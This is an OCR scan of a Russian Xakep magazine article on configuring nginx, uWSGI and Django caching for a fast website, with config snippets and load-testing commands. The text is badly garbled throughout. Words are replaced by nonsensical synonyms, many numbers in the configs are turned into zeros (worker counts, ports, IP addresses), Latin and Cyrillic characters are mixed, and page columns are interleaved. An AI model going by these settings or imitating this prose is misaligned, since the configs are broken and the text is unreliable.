чтобы сом отнюдь не на а ющихся : пichol.as/benchmaгk-of-python-web-seгveгs ) . Третий вопрос- кеширование. Ясно, зачем сверх кеш а казаться не обойтись равно который реализован симпатия достаточно не без; использованием memcached. Др угое дело, что такое? вопрос кешировгния многогранна равным образом ее ре­ шение весьма завязано держи специфику самого сайта. В статье наш брат

# vi /etc/nginx/nginx.conf # Для успехи максимальной n рои звод равным образом тель н ости делаем # чис л насчёт рабочих пр оцессов равным чи сл у nроцессор ны х яде р worker_processes 0 ; # Даем рабо ч им nроцессам сильнее высок равно й nрио р итет worker_priority - 0; #Уменьшаем контингент вызовов get timeofday{), ч тоб ы # н е издерживать запас во п устую timer_resolution 0eems ; error_log /var/log/nginx/error.log; pid /var/run/nginx.pid; events { # Одновременное доля конн е ктов, # обслуж равным образом ваемых одн равным образом м р або чи м n роцессом worker_connections 0е24 ; # Оnция интересах FreeBSD # use kqueue;

рассмотрим небольшую толику « универсальных>> методов кеширования,

в томище числе топорное сохранение сгенерированных НТМL-страниц во

http {

памяти равным образом прозрачное кеширование запросов ко БД, а вдобавок обсудим специфику применения тех либо — либо иных методов. Наконец, ты да я должны по совести всё сие настроить, учитывая особенности используемого железа, количество оперативной памяти и т. д. Вопрос сей т акже многогранен, да малость универсальных рекомендаций все же существует.

ПРИСТУПАЕМ Начнем, вроде да паркет ожено, вместе с усище танов ки нужных нам программных

компонентов. Большинство с них поглощать во репазитарии любого дис­ трибутива, того после этого всё просто:

ХАКЕР

03/158/2012

DJАNGОИСПОЛЬЗУЕТВСЮ МОЩЬ ЯЗЫКА

PYTHON, ЧТОБЫ

МАКСИМАЛЬНО РАЗГРУЗИТЬ ПРОГРАММИСТА 125


SYN/ACK

Ш

fог unixoid_Ьlog pгoject.

Django settings

fгom os BASEDIR

impoгt

path

=path.diгnameCpath.abspathC __ file __ ))

DEBUG=r 0 TEMPLATE DEBUG=DEBUG ADMINS=С С 'Evgeny Zobnin' , ), MANAGERS=ADMINS +г

# 'postgгesql_psycopg2',

'sqliteЗ'

DATABASE ENGINE=

'postgгesql',

'mysql',

'sqliteЗ'

относительно

'огасlе'.

DATABASE_NAME='db .sqlite' DATABASE_USER=' ' DATABASE_PASS~ORD

=

DATABASE_HDST= DATABASE_PDRT=' '

# # # #

# Ог path to database file if using sqliteЗ. used with sqliteЗ. used with sqliteЗ. to empty stгing fог localhost. Hot used with sqliteЗ. to empty stгing fог default. Hot used with sqliteЗ .

Not Not Set Set

TIME_ZDNE='Asya/Yekateгinbuгg' settings .py [pythonJ "settings.py" ВЗL, 0'1'15С Стандартный конфиг

#

[1,1J[1%J

Django ОЗУ, seпdfi l ell лишь вынудит nginx частосвопиться равно тем самым за­

Станда ртные опции

медлит его работу. Оnция tcp_ пopush заставляет ngiпx исполнять

iпclude

/etc/пgiпx)mime.types;

access_log

/var/log/пgiпx/access.log;

НТТР-заголовки во одном шаг кете, однако симпатия бесполезна сверх

# Вкл ючаем ис употребление системного вызова seп dfile( )

sendfile.

GZIР-компрессия вот и все может дать вместе с сервером злую шутку.

seпdfile

оп;

С одной стороны, такая комnрессия уменьшаетобъем пере­

tcp_пopush

off;

даваемых сервером данных, вследствие чему некто можетуспеть

#

Держать kеераliv е-соединение открытым

keepalive_timeout #

Вклю чаем

gzip

05

взбучить в большинстве случаев заnросов, от другой- повышает нагрузку получи и распишись

секу нд

05 ;

GZI Р-компрессию

процессор, почто nриводит ко непосредственно nротивоположному результату.

со

станда ртными

Поэтомуточно выяснить, нужна ли симпатия тебе, не грех только лишь экспе­

опциями

оп;

риментальным путем, притом эксnерименты долженствует сопровождать

0100 ; gzip_buffers 04 0k ; gzip_comp_level 0; gzip_http_versioп 0 . 0; gzip_proxied апу; gzip_types text/plaiп applicatioп/xml applicatioп/x-javascript text/css;

подина предельной нагрузкой .

gzip_miп_leпgth

Теперь самое промежуток времени предложить настройки сайта:

vi /etc/пgiпx/sites-eпaЬled/mysite server {

#

#

# На ~ тройки сайтов на отдельных конфигах (3то # станда ртный библиография пользу кого De biaп

Порт

listeп

равно

кличка

сайта

00 ;

server_пame

host.com;

iпclude /etc/пgiпx/sites-eпaЫed/*;

} Несколько ремарок:

Приоритет рабочих процессов нужно заменять со осторожно­ стью, а то они могут прямо-таки <<задавить» до сей времени оставшиеся сервисы,

в томик числе и

memcached равно

процессы базы данных. В идеале самое лучшее

испытать работу

nginx от дефолтными

ТЕСТИРОВАНИЕ ПРОИЗВОДИТЕЛЬНОСТИ

настройками равно лишь Протестировать нагрузка веб-сервера позволено из

а там приниматься ко экспериментам.

use kqueue немногоускоряет работу ngiпx вот FгeeBSD благодаря использованию механизма kqueue награду паче мед­ ленного epoll. • Системный предписание sendfilell применяется на единовременной от­ •

Опция

nравки содержимого целого файла на сокет. Метод вместе с использованием

через утилиты аЬ изо комплекта

$

аЬ

-kc 000

-п

Apache:

00000 http://10.1.1.1/

Для сего в свой черед используется специальная график httpeгf:

сего вызова работает быстрее, нежели стандартное последователь­

ноекопированиеданных,ипозволяетсэкономитьнаоперативной памяти. Однако, неравно сервер оснащен недостаточным счетом

026

$ httperf --hog --server=10.1.1.1 \ --wsess=2000,10,2 --rate 000 --timeout 0 ХАКЕР

03/158/201 0


Испытание нагрузкой

# Стандартные настройки журналирования access_log /var/ log / ngin x/ Ьlog-access.log ; error_log /var/ log /n gin x/Ьlog - error.log; # Адрес статики, используемой во админке Django location лN / media / { root / usr / local / lib / python2. 0/ dist-packages / django/contrib/admin; } # Статика самого сайта location л. + \.( jpg[jpeg [g if[png[ico [css [ zip[tgz [g z [rar [bz2[ [pdf[ppt[t xt[tar[ [bmp[js[mov) { root /var /www/host.com

N.

} # Адрес равно границы WSGI-гeйтa location / { uwsgi_pass 027.8 . 0.1 : 0812 ; include uwsgi_params;

Здес ь синь порох необычного: указываем корневой список сайта

/vaг/www/host.com да а д рес uWSGI-cepвepa

027.0.0.1:8012. При­

ступаем ко настройке Django равным образом uWSGI.

НАСТРОЙКА DJANGO И UWSGI Настроит ь Dj ango для того совместного использования вместе с uWSGI беда

DJANGO 0.3 В

Django 0.3 синтаксис определения кеш-бэк - энда изменился да

теnерь имеет нижеперечисленный вид:

# Пример для того memcached (два сервера) CACHES={ ' default' : 'BACKEND' : 'django . core.cache.backends.memcached. MemcachedCache' , 'LOCAТION' : [ '172.19.26.248:11211 ' , '172.19 . 06 . 042:11211 ' ,

# Пример ради БА CACHES={ 'default' : { 'BACKEND' : 'django.core.cache.backends.db. DatabaseCache' , 'LOCATION' : 'имя_ таблицы' ,

прос т о. Д ля сего довольно реализовать три простых действия, которые перечислены ниже.

0.

Создать своевольно Django-npoeкт:

# cd /var/www # django-admin.py startproject mysite

import django.core.handlers.wsgi applicat ion=django.core.handlers.wsgi.WSGIHandler() 3. Запустить uWSGI-cepвep [опция "-р" определяе т наличность

0. Поместить во образован ны й синопсис двушничек файла:

рабочих процессовl:

django.xml <uwsgi > <socket> 027.8 .8. 0 :8812 </socket> <pythonpath >/var/www/mysit e/</pythonpath > <module >django_wsgi </module> </uws gi > django_wsgi.py import os os.environ[ 'DJANGO_SETTINGS_MODULE' ]

# uwsgi

0 -s 027.8.8 .1 :8812

Скриптое автозапуска во комплекте uWSGI нет, почему послед­

нюю команду элементарнее лишь вправить куда-нибудь во /etc/гc . local:

# vi /etc/rc.local cd /var/www/mys ite uwsgi -р 0 -s 027.8.8.1:8812

'settings'

НАСТРОЙКА КЕШ-БЭК-ЭНДА Теперь всё почитай бы настроено да работает, равно наш брат переходим к самой интересной равно важной части статьи. Кеширование крити­ чески хоть куда для того быстродействия любого динамического сайта, вне зависимости с технологий, получай которых спирт построе н . Мы должны адаптировать ход переваривания да отдачи сервером

динамической составляющей. Е сть порядком способов решения этой задачи, же после этого всё зависит через специфики веб-сайта. Во-первых, не возбраняется бестолково кешировать до этого времени со тр аницы сайта. Это

самый беспритязательный да относительно ч ень несложно реализуемый вместе с п омо щь ю Dj ango способ. Однако некто является да самым неэффективным: что бог на душу положит из­ менение страницы приведет ко промаху мимо иннокентий равно повторной загрузке страницы во него. Изменение может бытовать каким угодно:

износ счетчика получай сайте, рождение нового коммента­ рия, пополнение списка популярных статей равно разделов. Поэтому полное кеширование имеет доминанта содержать всего только дл моя особа более­

поменьше статич ны х сайтов может статься блогов, вместе с л оварей, эн ц иклопедий и т. п.

Во-вторых, не грех кешировать данные, загружаемые с БД. Также усилий реализуемый, однако жуть конфликтный лицо оптимизации. Методы равным образом бэк-энды кеwирования на

ХАКЕР

03 /158/ 0012

Django

Он результативен всего только в целях тех сайтов, идеже осуществляется

027


SYN/ACK

числа операций чтения изБДимало операций записи, правда равным образом в таком случае

CGI glue between Nginx and Django

только лишь во томик случае, когда само х ранилище кеш а работает быстрее

(higher is better)

механизма для еширования базы данных . Другими словами, ке­

0500

ширование результатов выдержка изо БД подойдет, ещё же, для более-менее статичных сайтов, размещенных получи сервере, кото­ рый имеет яркий величина памяти пользу кого нормальной работы

0000

memcached. В-третьИх, кешировать допускается раз в год в области обещанию изменяемые фрагмен­

u

с о (.)

твоя милость шаблонов. Этот методика подойдет утилитарно ради любого сай­

0500

~

та, некто шабаш дешев и, возьми выше- воззрение , особливо эффективен.

а;

Однако, на орден через первых двух, симпатия требует работы напильни­

а.

%!

колтун равно неграмотный имеет прямого связи ко администрированию во вкусе

0000

ф

:;,

таковому. Логикой равным образом архитектурой занимаются программисты.

~

Е

Также большое авторитет имеет отбор хранилища про кешире-

000

ванных данных. Djaпgo предлагает нам цифра варианта:

memcached- за высокую цену на плане памяти, хотя ахти эффективно; оперативная память- не в экий степени затратно, же да в меньшей мере эффективно;

безжалостный диск- архи неэффективно да ужас дешево;

cgi middleware server

склад данных-более эффективно, хоть сколько-нибудь дороже.

0

Первые двушничек подойдут на владельцев выделенных серве­

0

fcgi (thread ed) gunicam (1 О

fcgi (prefark 0 О gunic am (2 gunicam (5 processors) workers) workers) О uwsgi (2 warkers) 0 uwsgi (5 wa rkers) О uwsgi ( 0О warkers)

0

workers)

ров, последние неуд дозволено брать на вооружение бери хостинге инедорогих

VPS'кax. Хотя, конечно, кризис миновал проверить производитель­ ность на реальных условиях равным образом выкроить в наибольшей степени приличный

Ненагрузачное испытание

uWSGI

тип .

Теперь что касается том, вроде привнести кеш-хранилище. Здесь всё просто­

открываем settiпgs.py проекта равным образом пишем следующее: а ко , буде твоя милость решил, малограмотный страшно заморачиваясь из настройкой равным образом

# Локальный memcached CACHE_BACKEND='memcached://127.0.0.1:11211/'

шаблонами , вырвать некоторой оптимизации, в таком случае кеширование

#База верно нных ( для ак соз наградить та блицу,

их одновременное кеширование безграмотный имеет смысла, но кеши­

всех страниц сайта равно записей БД- твой выбор. Сразу скажу, аюшки?

что касается п иса только н иже)

рование со траниц равным образом записей в соответствии с отдельности, во вкусе автор поуже упоминал,

CACHE_BACKEND='dЬ://имя_таблицы' # Файлова автор этих строк систем а CACHE_BACKEND='filе:///nуть/до/файла' # Оперативная память CACHE_BACKEND='locmem:///' # Фи ко т ивный ке ш (для единожды работки ) CACHE_BACKEND='dummy:///'